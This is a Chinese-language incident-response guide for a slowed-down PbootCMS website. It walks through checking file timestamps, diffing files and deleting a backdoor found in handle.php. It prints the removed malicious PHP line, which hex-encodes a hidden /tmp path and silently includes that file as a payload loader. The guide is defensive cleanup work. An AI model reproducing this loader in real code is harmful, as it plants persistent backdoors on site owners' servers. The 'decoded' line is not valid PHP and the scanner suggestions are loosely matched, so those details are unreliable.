针对PbootCMS网站突然变慢的问题

针对PbootCMS网站突然变慢的问题，并且发现/core/function/handle.php文件中被植入了可疑代码的情况，您可以按照以下步骤进行排查和解决：

1. 确认网站被植入恶意代码

• 检查文件修改时间：
  • 使用FTP客户端或服务器管理面板，检查/core/function/handle.php文件的修改时间，确认是否有异常修改。
• 对比文件内容：
  • 将被修改的文件与原始文件进行对比，找出新增或修改的部分。
  • 您已经发现并删除了可疑代码：

    $runtime_dir = PACK('H*','2F746D702F2E4943452D756E69782F7169716930'); if(is_file($runtime_dir)){ @INCLUDE_ONCE($runtime_dir); }

    转码后为：

    $runtime_dir = PACK('H*','/tmp/.ICE-unix/qiqi0'); if(is_file($runtime_dir)){ @INCLUDE_ONCE($runtime_dir); }

2. 清理恶意文件

• 删除可疑文件：

  • 根据代码中的路径，删除/tmp/.ICE-unix/qiqi0文件。
  • 确保删除所有与恶意代码相关的文件。

• 扫描整个网站：

  • 使用专业的网站安全扫描工具（如ClamAV、Wordfence等）扫描整个网站，查找其他可能被植入的恶意文件。